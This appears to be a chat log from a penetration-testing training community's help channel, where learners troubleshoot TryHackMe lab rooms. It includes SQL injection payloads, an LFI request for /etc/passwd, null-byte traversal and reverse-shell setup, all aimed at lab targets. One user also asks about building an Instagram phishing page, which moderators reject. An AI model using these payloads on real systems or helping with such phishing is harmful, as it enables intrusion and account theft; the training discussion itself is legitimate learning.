Instagram doesn't have its own phishing page, because of the definition of phishing
I mean how can you have a look-alike page of Instagram, is that possible?
The page that you see is what the browser renders.
The HTML and CSS is what tells the browser what to render.
Same HTML and CSS means same render.
Pages are rendered in a browser. That's how you look at sites.
That's an email
Just like this PlayStation email sent to me, I mean can I have the same copy of that to add to my phishing page
Yes
Stop.
lol
😅
It's also unrelated to the junior pentesting path
Just asked a question...Some people learn black hat just to be knowledgeable about it🤓
Yeah, and we don't tolerate that here.
Discord closes down blackhat servers.
We're not allowed to tolerate illegal activities.
Please stop. Please don't argue.
I wasn’t arguing just saying
That was arguing. And you're now arguing about that.
Ok
so do you want hack your ex's/crush's insta account using phishing page 😂 😂 😂 😂 Literally we get these dms daily😂
Yes I really want to😂and her friends
I would be careful about saying that around here. You can and will get banned for it
For what it's worth, it was dealt with.
Please don't try to start more trouble here, it's really irritating.
Hi
Hi there, is anyone facing problem on authentication bypass room? Specifically on Task 3? That ffuf command isn't working. Any thoughts on that?
From searching, I saw an issue on GitHub that multiple word-list feature isn't working. If I had a problem with word-list, I think I would face a problem on task 2.
Let me check it again.
oh, I am checking it again. Thanks for the suggestion!
Gave +1 Rep to @steel nymph
You are right. It was my mistake. Umm, can you give me another suggestion? If I were to save a huge output without any junk, what should I do in that case?
Thanks a lot, lassi! Kinda funny 😑 , I am afraid of awk/sed command, guess need to learn it very well.
I can see read, write, execute, and what's the meaning of the "d"... and how is "rwx" assigned to each file... I'm confused with the way it's assigned to each file and directory... meaning you can read and write some files while you can't in some?
I'm doing that and I don't understand the permissions
🦖
what don't you understand about it? Saying you just don't understand the permissions is the same as someone saying "I don't understand windows"
Lol it does. Same concept. There's a wide array of things to not understand
I think I have no probs with that anymore
👍
Yeah, just stop being a black hat! We are all meant to be white hats, working for the good of the world!
Ok🙇🏻
You wouldn't be threatening someone now, would you? More so, that wouldn't be threats of gender-based attacks, would it?
omfgyhgtbkm
Well, I learned a very valuable lesson today; probably only cost me an hour and a half of banging my head against the wrong brick wall
Those are the best lessons I find. They tend to stick around.
Wasn't pentester title permanent 🥲
Nope
Hi, I completed "Authentication Bypass" room but still confused about the whole process. Can anyone suggest good write-ups or more resources to learn and understand it better?
Also, for me, the way this room explained everything, it was kind of hard to understand, especially on Task 4. I think that reorganizing the sentences of this room and adding a little bit of extra content would make it more understandable.
Why, what was the part in task 4 you had a hard time with understanding?
For example, on PHP variable section, from where I got this variable and why I am using this and how the whole mechanism works.. it was bit tough to understand.
Umm, yeah, I admit that one may/should use search engine to get the whole picture, but comparing to other rooms where explanation/representation of contents are very good, this room is different, in my opinion.
can you suggest any resource/writeups/posts on authentication bypass?
Well tbh I don't know if there is any writeup or whatsoever that would explain it better as I never looked for such. But to fully explain everything in that room would mean they would have to add like how arrays work, what exactly the $_REQUEST variable is, how GET and POST requests send parameters etc. which in my opinion would be beyond that room's topic. But I can only suggest you to look up these mentioned topics, as I think it then should become more clear. 🙂
@shadow echo I got your point. I have another curiosity, without knowing the underlying mechanism, can anyone exploit/think how to work on this? I want to know how the mind of a pentester works and where I am lacking as a total noob.
I mean I'm also still a noob compared to many others, so I don't want to give you a suggestion on something I might not be qualified for 😄 But if we talk about that specific example, I think knowing the underlying mechanisms would always be good. But to know that this application is vulnerable to such an attack you might anyway have to see the source code of that application, so if you get to see the source code of it, it definitely helps you, but I think most of the time you are not able to see that, so you would anyway have to manually test it and therefore you would still be able to exploit it without exactly knowing the mechanism. But as I said, I'm also still a noob, so just take that as my opinion rather than a right answer 😄
@steady hollow this might be helpful: Black Hat Python, 2nd Edition
Thanks! I have a pdf copy, I will read it.
Gave +1 Rep to @bleak pilot
I got the point. Thanks!
If you are totally new to programming you may want to start here with the basics: Python Programming for Beginners: The Ultimate Guide for Beginners to Learn Python Programming: Crash Course on Python Programming for Beginners
I am familiar with python and java programming at basic level. I followed the Crash course on Python programming and it was a great book to read.
Good deal. Just didn't want you to feel like you just got thrown into the deep end of the pool.
Can I DM you?
Hey, it was a great suggestion. Any suggestions will be appreciated. ❤️
Of course.
Is anyone else struggling with Windows Defender on the DLL Hijack portion of the Windows Privesc room?
Struggling with Windows Defender? In what way?
It was blocking my download, but i recompiled and it accepted it this time.
on the "Walking An Application" module, task3 and task6, there are two questions where I entered the flags I found, but it told me they were wrong. I think it is a bug but I haven't seen anyone complaining. On task3, the framework flag, I entered the credentials I found to login and it popped a page with a flag. I am assuming that is the flag for the framework, but it tells me it is wrong. On task6, the same thing happened for the contact-msg network flag. Am I missing something?
Are you submitting the flag in the right format?
are you sure there is no errors when pasting?
I am copying and paste, so I am not sure what you mean on the right format -> THM{}
The entire room uses the same website. You can find a bunch of the flags before you actually need th
There's a good chance the flag you found will be used later
But it's not the right one for the task you're up to
Read the hint, the flag you are looking for is inside a downloadable file
ok, that makes sense. I just counted how many * are inside the asterisks for the contact-msg, and it does not match the one on the flag I found. I guess I will have to keep looking on that one.
for that one I looked at the header.
found it!, one down another to go.
Got both missing flags, the other flags I found weren't part of this section which means I'll probably see them in another module.
Yup
ok.
I give up.
LFI challenge 2
||I set my cookie to Admin||
But for some reason the request wont go through.
Like it does but it says it cant find the file
anyone else had issues
?
thanks @steel nymph lol.
Gave +1 Rep to @steel nymph
Hey guys I'm currently doing the final challenge in Cross-site Scripting in Introduction to Web hacking. I'm pretty sure my payload is correct but I feel like I'm waiting forever to get the cookie
Can someone dm to make sure I have the right payload?
I'm in!
A lot of helpful answers i found here even without asking, just exercising my searching skills, entering in:junior-pentester-path in the Search field 🙏🏻
Awesomesauce path!
Damn it! always in trouble with python exploits... Can't get a single one to work without errors. Library errors even though they're installed on my OS.
The Windows Privesc section isn't loading for me, anyone experiencing the same?
LFI - Lab1 (Task 4) - I am entering ||/lab1.php?file=/etc/passwd|| and I can see the passwd file, but I am getting the answer wrong. Any ideas? TIA.
What are you entering as answer?
I’m entering the thing that i covered up.
Mh, that should normally work. Have you tried CTRL + F5 (hard refresh) of the page ?
I just tried on my phone and it worked. I’ve been trying for 2 days on my laptop. Weird. Thanks for your suggestion though. I’ll try that next time i get stuck.
Gave +1 Rep to @shadow echo
Well I would have gotten another idea too, are you having bitdefender on your laptop?
Yes. Is that a problem? It didn’t stop me answering any of the other questions.
Yes, that's the issue for that answer then, it detects the /etc/passwd part of your answer as malicious.
@steel nymph so I'm making a post request with postman for challenge 3 and I'm getting to my file, it's just telling me it doesn't exist.
||I'm making a post request with my actual request within the body and it sends it over correctly without filter||
but it says it cant find it.
Getting annoyed.
You might not be doing the correct amount of directory traversal
What's the error/warning you get, can you post a screenshot?
yea
spoilers people.
heads up.
I've tried with and without nullbyte
tried multiple directory lengths.
and I know its something like glaringly obvious
Well it says failed to open flag3%00 instead of failed to open flag3, so seems like the way you send the null byte it's getting url encoded afterwards and therefore not doing what it should do
Guess I'm not that familiar with postman, am I somehow encoding it through my form request?
||sending it through the body as form data||
I don't know postman, so I can't give you the answer on that, like how to make postman not url encode the null byte. Also that's just my guess that this is the issue, what does your request look like in postman? I would do the request in the network tab of the dev tools for example.
For some reason after i resend through the dev tools the page doesnt move and acts like i did nothing.
I did.
just acts blank.
cancel that.
I managed.
thanks @shadow echo and @steel nymph, ended up erasing that nullbyte for some stupid ass reason. The request I made wasn't adjusting the page due to where the request was going.
Gave +1 Rep to @shadow echo
+rep @steel nymph
Gave +1 Rep to @steel nymph
can someone please help me change the GET request to a POST request on the developer page or burpsuite to get the flag for our first challenge on File inclusion Task 8?
yes I kinda have a good idea but when I tried to do it on burpsuite after intercepting the connection and sending it to repeater, not sure how to change the request method to POST
@steel nymph So I just got to change the request line to POST to have it changed?
I am gonna have to check out some youtube videos, lmk if you have any suggestions
@pallid mist make sure you use your other resources. Plenty of info online about how POST works. 😄
Where could I find exploit for CVE-2018-16763 (Vulnerability Capstone Module). I tried ExpDB, github and rapid7 where else I should search?
I found 4 RCEs, managed to connect using one of them, but couldn't get access via nc
@steel nymph also, there is an exploit on AttackBox but, I could not find that one.
then, I should try again.
The one on AttackBox should be fine. Don't forget to learn what that exploit is doing as you may need to change something and or/use something additional to it
where can I find that exploit outside of attackbox?
On github for sure, it is there
nope, i tried.
there are 5 of them on github, one ruby one bash and 3 py
none of them are same as the one on attackbox
Strange. By googling CVE number it gets me to the same py script on github as the one on attackbox
what am i missing here!
Are you on a VM?
aye
And openvpn is running directly inside that VM?
oh, nay... I am on my machine, not vm
and open vpn running on my machine
and I am using tun0 ip as my IP
Okay, so your attacking machine is not a VM, it's an installed OS?
yes
If you check the interfaces, how many tun interfaces you see? Only 1, so tun0 ?
What, like tun1, tun2 ?
nope
So then there are no other tun interfaces except tun0 ?
192.168....
As the others are most likely eth and lo
K, do you want to try entering my THM IP and my given port to see if I receive the rev shell, just to check if it's an issue on your side or the target machine?
10.14.17.128:4242
You let me know when you tried it, right ^^?
Could you post that image again? As I can't find it anymore
Have you tried to run it without putting http:// infront of the IP ?
Gave +1 Rep to @shadow echo
it says url, that's why I tried with http:// every time
So it worked now?
Alright, great
Well the error said max retries on url: //IP so it looked like the http:// could be the issue
Not a problem
.
hey, I am new to metasploit
I didn't get why my exploit does not work, can someone explain?
Is that wordlist you specified just containing passwords? As in case it does, it's specified in the wrong option. The option you set the wordlist to is meant for a USER+PASSWORD file.
Hey guys! On Command Injection, for Jr. Penetration Tester Task 2 Q1, I know this answer but it keeps giving wrong answer?
Ahh never mind... I just removed a special character... so weird...
It should have been complete not an incomplete PHP code snippet.
guys I'm trying to find flag1 on the file inclusion challenge but this thing does not work, tried many times, any guesses??
You are missing a content-type header
I know I need a scanner for the job
oh silly mistake 😄 thanks
Gave +1 Rep to @shadow echo
How illegal is it to try out these methods on public websites? Asking for a friend...
Hi guys, i'm in the task 8 of sqli (J-P-P) and I don't know what is wrong with the payload
||admin123' UNION SELECT SLEEP(5),2 from analytics_referrers where domain like '_%||
Anybody can give me a clue, ppppllslslsl!!
Is that SQLi Timed Based?
Task 7 Boolean based, my bad
nono, task 8, sorry
Time Based
Was looking at my notes and your syntax is incorrect.... the tricky part is the syntax after "like"... Not sure how you came about that syntax in your first post. Look at the second command from top down.
did you try the admin' UNION SELECT SLEEP(5),2;-- and what is the time you get when you press enter?
That gave me 5 secs
I think that I got the table_name = ||'analytics_referrers'|| and column_name ||domain and id|| . That's right?
Correct...on the 5 secs. Get rid of that underscore between analytics and referrers...
Look in your browsers' URL string
I know it's not solid black and looks faded....
analytics?referrer=user' --- also, get rid of your plural on the referrer...
Then add the 2nd syntax in the instructions top down..
after that, it gets interesting....
Look at task 7, 2nd syntax from bottom up...
Plug them all in, just keep messing with it... the hardest part is the finding the password that gets you that flag.
Password for admin...
Hey guys, why doesn't kali let me download burpsuite, updated JAR file but it's fine downloading on a Windows system?
No Proxy, no burpsuite and no interception proxy is on. Burp is closed.
Any scanning of a public website will most likely get your IP blacklisted by your ISP. You could also go to jail for scanning without permission
Thanks. I figured as much. Are there websites available that welcome people practicing the techniques?
Gave +1 Rep to @drifting drum
So apparently in task 8 of SQL Injection you can find a 'analytics_referrers' table name. I'm guessing I shouldn't be able to find that.
Wait. Looking up a few comments... Is this the right table name?
Look into bug bounty programs. While many of them don't allow scanning, it's the closest you'll get to legal hacking outside of a professional role
when I ping most websites, I tend to see their IP and once I visit the IP it directs me to the website. Ping tends to give me an incorrect IP of instagram and some websites but does give me correct IPs of facebook and google... Why?
Tryhackme machines, your own local instance of DVWA
the best way to know for sure is to try. Can you gather some useful intel from this table ? if not, maybe you should try something else ?
guys i'm stuck on task 8 of sql injection can't get the flag
tried adding sleep() in the boolean based payload as they said but nothing happens
||admin123' UNION SELECT SLEEP(5) 1,2,3 FROM information_schema.tables WHERE table_schema = 'analytics_referrer' and table_name 'users' and coloumn_name like 'admin%';--||
i'm using this payload is it right??
WHERE table_schema='analytics_referrer' is not right. It's not supposed to put a table name in there
Oh okay, well then gj 🙂
tried changing numbers in password like
I'm on task 13 of burpsuite basics. Struggling to find the flag
Im at the right place just need a hint where to look
If I remember correctly, you have to visit a certain site (so make sure to visit every site once) in order for a script being executed that will place that "unusual" endpoint in your burps sitemap.
@shadow echo I visit every page once
Sry but I have a hard time seeing if you use a photo instead of a screenshot
This is where im at
Have you disabled javascript or is something blocking javascript? As from what I can see is that the javascript files are grey, so therefore they never got requested. Make sure there is nothing blocking js.
Also maybe turn off intercept in the proxy tab meanwhile, maybe that's causing the issue as the page itself never gets loaded.
Thank you, I'm going to try opening the browser with burpsuite
So have you tried turning off intercept and visit all pages again? As somehow it feels like that's the issue. Your proxy tab is highlighted so I guess there is intercept turned on.
Thanks so much it was the intercept on
Ok, so still on SQLi. I've found a column name ||domain|| but when I got to the next step and put in ||==admin123' UNION SELECT SLEEP(5),2 from domain where username like 'a%|| it gives me an error, ||SQLSTATE[42S02]: Base table or view not found: 1146 Table 'sqli_four.Domain' doesn't exist||. Is that not the right column name? Also, if I understand it correctly there's only two columns, one being 'id' and the other ||domain||. So where am I going to find the password?
Wrong column name
Yep. Just found the answer but I had to assume the column name and run with it. It never gave me a time delay on ||users||. I don't know what that's about.
I was hoping to do a write up on this one but since I never fully understood how to enumerate to the right column name I'll look for another room to write up.
You have the right idea. If it isn't working try refreshing
I'll give that a shot just for 💩 and giggles. I've spent hours on it trying to understand it. What's another five minutes?
Lol. You have the understanding down. Now it's just an error that's not in your contr
Control
That seems to happen from time to time. The more I learn the more I begin to understand THM's setup. I imagine they have their hands full and appreciate what they do more and more.
Hmm... Still isn't hitting anything on either ||=admin123' UNION SELECT SLEEP(5),3 FROM information_schema.COLUMNS WHERE
TABLE_SCHEMA ='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME
like 'id%';||
or ||=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE
TABLE_SCHEMA ='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME
like 'domain%' and COLUMN_NAME !='id';|| with 'users' in the place of 'id' in the first one and 'domain' in the second. Oh well. I need to study SQLi better I think.
Table name is wrong
Well, technically its correct cuz it is a table
But it's not the table you need
When you do SQL injections like this, you need to make sure you find all the tables
hey guys, if there's a CVE number, that means there's definitely a public exploit somewhere to download?
I don't think that automatically means there has to be an exploit to download. But I guess for a THM room there might be one.
Ahh okok thank you!
Gave +1 Rep to @shadow echo
Definitely not
Has anyone solved this... I couldnt get the answer
I didn't get the staff cookie from both methods...
Hello guys, can you open the acmeit site by adding the attackbox ip?
You have to start the target machine and enter the IP of that target machine in order to get to the correct site. Entering the attackbox IP will not work.
@shadow echo Ok,thanks. How do i start the target machine?
Pressing the green "Start machine" button attached in one of the tasks. The little green icon in that image is indicating at what task the target machine is attached on. This image is just an example, so not from the room you might be actually in.
oh ok,awesome,thanks!
hello friends, in the Subdomain Enumeration room I am required to use FFUF -w /usr/share/wordlist/SecList.. etc, however, I do not have SecLists file on my kali linux
as far as i know thm uses parrot OS, what wordlist should i use in kali?
Well the wordlist shouldn't have anything to do with the OS. So if you don't have seclists installed, just install it.
oh its a program? ok thanks
No it's not a program, it's just a compilation of a lot of wordlists for different purposes. https://github.com/danielmiessler/SecLists
i used apt install seclists, is it downloading the same one?
I guess so yes
thanks batman
Not a problem Guinea pig 😉
So I just finished the SSRF room but I want to understand why using x/../ bypasses the ip block when changing the avatar?
This might be a huge oversight on my end, but I'm on task 9 of the burp suite module and I don't see any option that matches the answer format in the right click options that will "allow you to intercept and modify the response to your request." Is there a change in the current version versus when the module was written?
So did you capture a request and then right clicked inside that request?
Yes.
One of the options has a sub dropdown that leads you to the answer.
thanks +1
Gave +1 Rep to @shadow echo
In the SSRF room it's mentioned that it works due to directory traversal. Directory traversal simply means getting access to restricted files and directories. Here as you can see initially I am at my / directory, now I go to (/root/go/pkg/mod/cache) > now think of a .png file which is inside assets/something/something.png in the SSRF room practical. Now, look, just by using /../private I changed myself to move from /root/go/pkg/mod/cache to /private (I made a directory named private just to show you) and the file inside the /private folder is displayed in base64 format in the website source page...
In the x/../ example does the x directory actually exist or does it not matter
X does not exist... we just do it to make our directory traversal exploit work...
I did the room a while back, but I was confused by traversing a non-existent directory
I am working on this room: https://tryhackme.com/room/nmap04
I checked all the links available in references, no idea what the title input is.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Windows HTTP Protocol Stack ('HTTP.sys') Parsing Error Lets Remote Users Execute Arbitrary Code.
got it http-vuln-cve2015-1635.nse, it was ofc this title
so to find the script you can use locate *nse on the CLI, hit ctrl + shift + f and now you can slowly type the cve; also you can use locate *cve2015-1635.nse and it will pwd.
hey I have a question for you guys who have been using THM for a long time. I am planning on becoming a CyberSecurity specialist. Should I just try as many tryhackme rooms as possible as soon as possible or should I first get the knowledge, pass the certs (Networking, Security, etc.) and then do THM rooms as an experience gainer?
As many as possible as soon as possible is defo not a good approach. I would rephrase it to: nail as many rooms as possible following a methodological approach. Without some fundamentals it will be very hard, so try to learn networking fundamentals, web fundamentals, linux fundamentals, scripting (as an entrance to a wider coding area). Just don't rush yourself, try to understand rather than skipping, as not fully understanding will catch you later anyway and you may lose more time rather than trying to understand that at the beginning.
There are paths on THM Complete Beginner, Presecurity, Web Fundamentals... I probably would advise to start from those, but I haven't done them myself as I gained experience somewhere else. Perhaps someone who completed those paths can advise more if they are good to start with or better to start externally from taking some online courses targeting particularly Networking only, Web only, scripting (bash/python) only...
Just "doing rooms" is pointless. Your goal should be to build out a solid methodology for attacking all sorts of rooms. You want to make sure you learn something from every room you do.
I disagree.
Seeing as many different things as you can will make you better.
True, but just running through the rooms and not learning anything from them won't get you anywhere. It only helps to see many different things if you learn something from attacking those things.
"but just running through the rooms and not learning anything from them" You'd have to make a conscious effort not to learn anything from completing the rooms NGL
guys in burp suite intruder room task 11 i try to fuzz numbers but i don't get the flag
although the ticket numbers which are already there respond with 400 error
why is that??
I kind of agree with this, I started out with a random CTF, I knew nothing when I went in and after Googling like a mad man to come out with 6/23 flags I learned an incredible amount.
I then took a step back and did the networking path then junior pen test on THM. The bits that weren't covered directly were linked off to external resources or other rooms.
Good luck and enjoy the ride
Methodology is important, but so is experience.
If you've seen something similar 10 times before, it's going to be easier. You're going to be able to identify any issues or weird behaviour more easily.
guys can i get some answer??
Wrong url
http://MACHINE_IP/support/ticket/NUMBER
Why am I getting this error again and again, could anyone help me out, please.
idrsa.id_rsa should be only id_rsa
do I need to convert it? or just rename it to id_rsa?
okay! Thank you @modest arch
Gave +1 Rep to @fervent pendant
anytime, lmk if you need some help again
File extensions are meaningless outside of Windows.
yes, I checked both files, both of them are the same
can anyone guide me what am I missing here, please?
Try python2.
okay
no luck
$python /usr/share/john/ssh2john.py id_rsa > idrsah.txt
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
python2.7
bash: python2.7: command not found
You might have to work out where it is then. python doesn't mean python2 necessarily.
Yes, I remembered it afterwards but forgot to correct myself
Your john/python installation could be broken as well, no?
as I see python2.7 is not installed on my distro
Hey, I was doing linprivesc room task 5. I couldn't download exploit file from attacking system http.server using wget as it shows "connection timed out" error. I tried changing ports (like 9001, 9003).
It has been solved after installing python2
got stuck on Linux PrivEsc/ Privilege Escalation: SUID
Could anyone give me hints on how to get user2 password? I could not find resource for 'how to extract suid?'
Did you find an unusual binary with the SUID bit set? Once found, refer to GTFObins to see how to make use of it. In one of the sections for LinPrivesc it was covered btw. Once you have found something interesting you need to use another technique for obtaining the user2 password
im having an issue accessing a website, im doing the content discovery section of this path
task 2, asking me to go to the robots.txt site but its not loading
im either getting error 405
or took too long to respond
im running the attack machine
also connected using openvpn
instructions telling me to use machine ip to go to robots.txt site but its not loading
You're using the attackbox's IP.
You need to use the IP of the target machine.
Hello! I do not really understand at SSRF room last task, the "x/../private" part. How is this working? I see this like doing "cd x/../Documents" but this will not work
ok thank you, how can i find the target machine's IP
Gave +1 Rep to @idle bison
Deploy the target machine. The IP will be shown under the 'Active Machine Information' heading.
If you do not see that heading, you have not deployed the machine
for some reason it was showing the same ip as the openvpn one
thank you, i will try this
Then you were looking in the navbar
Oh, and what is the +rep functionalities on the server? 🙂
Hey guys, having trouble getting Task 11 for J.P.T. Unable to find the flag and don't even see a single status code of 200, they're all 302.
Task 11 for what room?
Burp Suite, my bad - Intruder...
I have been spending a few hours on this task 11 for Burp Suite Task 11 - Intruder... All I see is status code of 302.
I did change the position in according to our task for next step.
I ran it twice... still all 302's.
Is the payload supposed to have just one file like the "combined.txt" for this sniper attack? or both the username and password list of 100 each?
You are just fuzzing the ticket numbers, so what you mean with username and password list?
Payloads..
The payload is just numbers from 1 to 100
For users or passwords?
I don't understand what you mean. The initial request you capture has to be a request while you are being logged in.
I'm not understanding this task either.. For the payload, of 1 to 100, you have to load something, right?
In task 10 you had to get a user and a password. So with these creds you are going to log in. Then you capture a request that's going to http://MACHINE_IP/support/ticket/1 and send it to intruder to fuzz all the ticket numbers from 1 to 100
I did that... as stated.... for the payload 1 to 100... you have to load something in there? We're using sniper for this task, correct?
I did get past task 10. I have the request and sent it to intruder.
Then, it's saying after setting your position, which is sniper... and then run the attack... there should be a status code 200 .... but I don't see it, unless I am doing it wrong?
Because all the status codes showing are 302s.
Send a screen of your intruder tab with the request and the position pls.
All you basically need is a word list with the numbers 1 to 100 for example
You said you are already past task 10 aren't you?
Correct
So why are you using a request that's going to the login page?
I thought the idea was to point to the login page?
Not trying to be ignorant, might be that I am making this to be harder than it needs to be.
No, I already gave you all the steps you have to do: In task 10 you had to get a user and a password. So with these creds you are going to log in. Then you capture a request that's going to http://machine_ip/support/ticket/1 and send it to intruder to fuzz all the ticket numbers from 1 to 100
I'll re-try this out again.
I feel like I'm digging myself a hole... Should I go back to Task 10 to start over?
Well it's basically straightforward, so you have the valid creds to login, right?
- check for the type of request you intercepted, is it GET or POST?
- are you sniping the correct value support/ticket/NUMBER?
- are you logged in?
@modest arch I closed out the browser and Burp, so going back to Task 10 again.
Well if you have the valid creds to log in, there is no need to go back, if you don't have the valid creds, you should do that yes.
But which valid creds? When I first logged in, I only saw 3 tickets. Went to each one and nothing showed that flag i needed.
The valid creds which you gathered in task 10. So as you already saw tickets, I assume you must have the valid creds already ^^
the same way you bruteforce a password, you are now bruteforcing the ticket.
True, but for the sake of learning.. I'll relearn this at task 10 and go from there. But having mental block about just fuzzing..
Alright, ye might help you to just redo task 10. It's like I said pretty straightforward and indeed I think you are making it way more difficult than it is 🙂
the options you have to set
Yeah, sorry guys and @modest arch ....
there is no need to apologize, everyone learns at their own pace, take it easy and kill it.
Thanks... even my boss always tells me not to apologize.. I need to just stick with it and stay focused...
Gave +1 Rep to @thorn crest
thank you!
Gave +1 Rep to @lost bay
Damn, now there's not a valid user showing up that stands out in task 10. 😦
Like it did the first time.
I got it now...
How do i know which is the correct support ticket #? I have 3 of them and one is green and the others are red.
I was able to log in with a valid creds.
Most likely none of these tickets are the correct ticket with the flag, if it were one of these tickets there would be no need to fuzz for other tickets. I think the issue with understanding you have is with these 3 tickets that are displayed to you. These 3 tickets are the tickets that are assigned to that user account. Let's say one of these tickets has the url /support/ticket/78 and again another has the url /support/ticket/85 (just example numbers). But overall in the system there might be 10 tickets in total, where like mentioned only 3 tickets are assigned to that user account you are logged in with. But that doesn't mean you might not be able to access the other 7 tickets by simply trying to open /support/ticket/99 (which might be a ticket not assigned to that user account but you can still access it by trying to open that url)
That's correct, having a hard time understanding this part.
And with just fuzzing them you try all the ticket numbers from /support/ticket/1 towards /support/ticket/100 in order to see which ticket numbers do exist in the system and you are able to access
I will check that out.
Is there an easier way to automate from 1 to 100 instead of just doing it one by one?
Of course, that's why you are using intruder for that.
Doing a sniper attack.
Or you mean for the payload itself?
Well, 1. In Sniper position, do I Start Attack each time from 1 to 100 each time manually? And 2. Payload Sets are 1, Numeric, and payload option from 1 to 100 and step 100.
It seems I have to keep fuzzing each time from ticket 1 to 100?
FYI... I manually changed from support/login to support/ticket/#
Unless I am supposed to re-grab the request GET again from the support ticket?
Well the position for the sniper attack is obviously the position in the url where the number is located. If you set step 100 it will do a request with /1 and a second request with /101 (technically). So the step you want to set is 1.
And the initial request you capture has to be a request while you are logged into the user account and trying to open for example /support/ticket/1
Yeah, it looks like I am doing something wrong here, unfortunately.
It may seem simple for you but for me, it isn't. 😕
So are you actually logged in with the user account on the website itself?
Yes I am currently.
Then try to open /support/ticket/1 in the browser while intercept is turned on in burp and capture that request in burp
Doing that now.
Done
Then, push that request to Intruder, then fuzz it?
So then send that request to intruder, set the correct position and maybe send a screenshot for me to verify
Want me to try to fuzz it or just send you the settings?
I meant, start the attack?
I mean ye try it if you think it's correct and in case it's not working send a screen of the request in intruder afterwards
Okay, so as you saw with step 100 it's only doing 2 requests. So you want to set step to 1 as we always want to increment the number by only 1
It's going to 100 now..
So has it done 100 requests now?
Not yet, it's 48/100
Alright
I do see the length that stands out the most so far.
Like in task 10
Well the length is not the important thing in that case, as you only wanted to verify which tickets exist. So therefore you have to go by status code
All 200 status codes are tickets that do exist and you are able to access
OK... I only see 404 and 302 so far.
Finished...
Going to look...
OK now, I don't see a status code of 200 anywhere.
Could you send a screen like the previous one?
Well it seems you have not used the same initial request as in the previous image you have sent, as there is no session cookie in it. Or the session cookie got altered.
The 404 status code has the cookie...
Well I don't know why that is, have you accidentally set a position on the cookie?